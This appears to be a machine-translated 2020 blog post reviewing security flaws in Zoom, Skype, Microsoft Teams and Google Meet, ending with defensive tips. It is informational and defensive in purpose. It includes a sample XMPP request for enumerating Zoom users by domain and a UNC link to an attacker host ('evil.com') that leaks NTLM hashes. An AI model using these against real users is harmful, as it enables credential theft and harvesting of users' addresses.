image

The basic requirements for services for organizing video conferencing are quality, reliability and security. And if the first two requirements are generally comparable for all major players, then the security situation is significantly different. In this post, we’ll take a look at how protection works with the most used services: Zoom, Skype, Microsoft Teams and Google Meet.

Since the start of the pandemic, all video conferencing services have experienced explosive user growth:



image
The increase in the value of Zoom Video shares since the start of the pandemic. Source: Investing.com

However, the massive demand caused not only the growth of the stock price of companies , but also clearly demonstrated the problems with the security of services, about which earlier why no one thought. Some of the problems are related to the quality of programmers' work and can lead to remote code execution. Others are based on incorrect architectural solutions that provide the opportunity for malicious use of the service.

Zoom


Zoom Video literally broke into the videoconferencing services market and quickly became a leader. Unfortunately, leadership was manifested not only in the number of users, but also in the number of errors detected. The situation was so depressing that the military and state departments of many countries forbade employees to use the problem product; large companies followed suit. Consider the Zoom vulnerabilities that caused these decisions.

Encryption Issues

Zoom declares that all video calls are protected by encryption, but in reality everything is not so beautiful: the service does use encryption, but the client program asks the session key from one of the servers of the “key management system” that are part of Zoom’s cloud infrastructure. These servers generate an encryption key and give it to subscribers who connect to the conference - one key for all conference participants.

The key is transmitted from the server to the client through the TLS protocol, which is also used for https. If one of the conference participants uses Zoom on the phone, a copy of the encryption key will also be transferred to another Zoom telephony connector server.

Some of the key management system servers are located in China, and they are used to issue keys even when all conference participants are in other countries. There are justifiable fears that the PRC government may intercept encrypted traffic and then decrypt it using keys received from providers on a voluntary basis.

Another encryption problem is related to its practical implementation:

  • although the documentation states that 256-bit AES keys are used, their actual length is only 128 bits;
  • AES algorithm works in ECB mode, when using which the encryption result partially preserves the structure of the source data.

image
The result of image encryption using ECB mode and other AES modes. Source: Wikipedia

Vulnerability per 500 thousanddollars

In mid-April 2020, two zero-day vulnerabilities were discovered in Zoom clients for Windows and macOS. The Windows client RCE vulnerability was immediately put on sale for 500 thousand US dollars . To take advantage of the error, the attacker must call the victim or participate in the same conference with her.

Vulnerability in the macOS client did not give such opportunities, so its use in real attacks is unlikely.

Responses to Unauthorized XMPP Requests

At the end of April 2020, Zoom discovered another vulnerability: with the help of a specially formed XMPP request anyone could get a list of all service users related to any domain . For example, you could get a list of user addresses from the usa.gov domain by sending an XMPP request of the form:

<iq id='{XXXX}' type='get' from='any_username@xmpp.zoom.us/ZoomChat_pc' xmlns='jabber:client'> <query xmlns='zoom:iq:group' chunk='1' directory='1'> <group id='usa.gov' version='0' option='0'/> </query> </iq> 

The application simply did not check the domain of the user requesting the address list.

Capture control of macOS

two vulnerabilities were detected in the Zoom client for macOS that could allow an attacker to take control of a device.

  1. The Zoom installer used a shadow installation technique that malware often uses to install without user interaction. A local unprivileged attacker could inject malicious code into the Zoom installer and gain root privileges.
  2. By injecting malicious code into the installed Zoom client, the attacker could gain access to the camera and microphone already provided to the application. No additional requests or notifications will be displayed.

UNC Vulnerability in Windows Client

A vulnerability found in the Zoom client for Windows could lead to leak of user credentials through UNC-links . The reason is that the Zoom Windows client converts links to UNC paths, so if you send a link like \\ evil.com \ img \ kotik.jpg to chat, Windows will try to connect to this site using the SMB protocol to open the file kotik.jpg. The remote site will receive a username and NTLM hash from the local computer, which can be hacked using the Hashcat utility or other tools.

Using this technique, it was possible to run practically any program on the local computer . For example, the link \ 127.0.0.1 \ C $ \ windows \ system32 \ calc.exe will start the calculator.

Video Call Leaks

In early April, on YouTube and Vimeo appeared in open access recordings of personal video calls of Zoom users . These included school lessons, psychotherapy sessions and medical consultations, as well as corporate meetings.
The reason for the leak was that the service assigned videoconferences with open identifiers, and the conference organizers did not protect access to them with a password. Anyone could “merge” the recordings and use them at their discretion.

Zombombing

This is the case when insufficient attention to the default security settings for conferences leads to sad consequences. To connect to any video call in Zoom, it was enough to know the identifier of the meeting, and prankers began to use it in large quantities. They burst into online lessons and practiced there in a kind of “wit”, for example, launched a screen demonstration with a porn movie or painted a document on the teacher’s screen with obscene images.

Then it turned out that the problem is much wider than just the disruption of online lessons. Journalists at The New York Times discovered private chats and threads on the Reddit and 4Chan forums, which participants held massive campaigns to disrupt public events , online meetings of alcoholic anonymous societies and other Zoom meetings.They searched for the publicly-accessible requisites for connecting, and then invited other trolls to join the “fun.”
Work on bugs

Massive refusals to use the service forced Zoom to take emergency measures. In his CNN interview in early April, Zoom CEO Eric Yuan said that the company was moving too fast, so they made some mistakes. After learning a lesson, they took a step back to focus on privacy and security.

In accordance with the program "90 days to safety" , Zoom On April 1, 2020, it stopped work on new features and took up the elimination of identified problems and auditing code security.
The result of these measures was the release of Zoom version 5.0, which, among other things, upgraded AES encryption to 256 bits and implemented many other improvements related to default security.

Skype


Despite the rapid growth in the number of users, Skype appeared only once in the information security news of the current year, and even this was not due to the vulnerability. In January 2020, one of the former contractors told The Guardian that Microsoft for several years listened and processed the voices of Skype and Cortana users without any security measures. However, for the first time this became known back in August 2019, and even then representatives Microsoft explained that the collection of voice data is carried out to ensure and improve the operation of voice services : search and recognition of voice commands, speech translation and transcription.

image
The result of a search in the vulnerability database for Skype. Source: cve.mitre.org/cgi-bin/cvekey.cgi?keyword=Skype

As for the vulnerabilities, according to the CVE database, in 2020 no vulnerabilities were found in Skype.

MS Teams


Microsoft pays a lot of attention to the security of its products, including MS Teams (although the opposite opinion is widespread). The following vulnerabilities were discovered and fixed in Teams in 2019-2020:

1. CVE-2019-5922 is a vulnerability in the Teams installer, which it allowed an attacker to slip him a malicious DLL and get rights in the target system, since the installer did not check what kind of DLL was in his folder.

2. The vulnerability of the Microsoft Teams platform allowed to compromise user account using a picture.

image
Scheme of attack on MS Teams using a picture. Source: www.cyberark. com/resources/threat-research-blog/beware-of-the-gif-account-takeover-vulnerability-in-microsoft-teams

The source of the problem was how Teams works with image access tokens. Two tokens are used in the platform for user authentication: authtoken and skypetoken. Authtoken allows the user to upload images in the Teams and Skype domains and generates a skypetoken, which is used for authentication on the server that processes commands from the client, for example, reading or sending messages.

An attacker intercepting both tokens can make Teams API calls and gain full control over the account:

  • read and send messages,
  • create groups,
  • add and remove users,
  • change permissions.

To intercept, it was enough to lure the victim to a subdomain of the domain teams.microsoft.com controlled by an attacker using a GIF file. Then the victim’s browser will send the authtoken to the hacker, after receiving which he will be able to create skypetoken.

3. Several vulnerabilities discovered by Tenable researchers in the component for sending thank-you cards (Praise Cards) and chat windows, allowed to implement a code for unauthorized changes in settings, as well as for the theft of user credentials. Microsoft did not issue separate recommendations for these problems, fixing them in the new version of the application.

Google Meet


Unlike similar services, Google Meet fully works in a browser. Due to this feature, over the past two years, video conferencing from Google has never been featured in information security news. Even the 30-fold increase in the number of users caused by the pandemic did not reveal vulnerabilities affecting their security.

Our recommendations


The use of any program requires a responsible attitude to security, and the means for video conferencing is no exception. Here are some guidelines to help protect your online meetings:

  1. use the latest software
  2. download program installers only from official resources,
  3. don't post meeting IDs online,
  4. Protect your accounts with two-factor authentication,
  5. Only allow authorized users to connect to meetings,
  6. close the possibility of new connections after the start of the event,
  7. enable the organizer to block or delete the participants of the meeting,
  8. Use modern anti-virus solutions that provide comprehensive protection against new and known threats.

Compliance with the rules of online hygiene for video conferencing will allow you to work efficiently and safely even in the most difficult periods.

Source